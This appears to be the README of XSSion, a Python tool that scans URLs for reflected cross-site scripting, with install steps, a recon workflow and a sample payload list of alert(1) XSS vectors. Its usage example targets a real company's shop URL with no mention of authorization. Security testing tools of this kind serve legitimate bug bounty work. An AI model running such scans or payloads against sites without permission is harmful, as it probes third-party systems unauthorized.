XSSion is a fast, transparent Reflected XSS scanning tool designed for bug bounty hunters and penetration testers.
It shows every payload being tested in real time and clearly highlights reflections in the response.
- ⚡ Quickly finds reflected XSS vectors
- 🎯 Shows live testing in terminal
- 🔍 Automatically detects parameters (even blank ones like
?param=) - 📌 Saves results to
XSSion.txt - 🐍 Written in Python 3
- 💥 Beginner friendly and bug bounty ready
Clone the repository:
git clone https://github.com/alhamrizvi-cloud/XSSion.git
cd XSSionInstall dependencies:
pip3 install -r requirements.txtTo run xssion from anywhere:
-
Add the shebang at the top if not present:
#!/usr/bin/env python3 -
Give execute permissions:
chmod +x xssion.py
-
Move to a directory in your PATH:
sudo mv xssion.py /usr/local/bin/xssion
Now you can run:
xssion <URL> <xss_all_payloads.txt>
or
xssion <URL> xss_all_payloads.txtpython3 xssion.py "<URL>?param=" xss_all_payloads.txtExample:
xssion \
"https://www.bmw.de/de/shop/ls/cp/physical-goods/de-BF_ACCESSORY?tl=" \
xss_payloads.txtxss_payloads.txt:
"><svg/onload=alert(1)>
<script>alert(1)</script>
"><img src=x onerror=alert(1)>Reflected payloads are saved to:
XSSion.txt
Example:
[XSS] https://target.com/search?q=<script>alert(1)</script> | <script>alert(1)</script>
- 🧪 Automatic parameter detection
- 🟡 Shows each payload tested
- 🔴 Highlights reflected ones
- 📊 Results logged to file
gau / katana
↓
paramspider / arjun
↓
filter URLs with params
↓
XSSion
↓
If Reflected = manual verification
- XSSion finds reflections, try manual testing too if the parameter is vulnerable
- Some sites sanitize input or use client-side encoding
- Works best during early recon
- Python 3.6+
- Linux & macOS
Alham Rizvii — Bug Bounty Hunter & Cybersecurity Enthusiast Contributors are allowed
This project is licensed under the MIT License.
See the LICENSE file for details.
....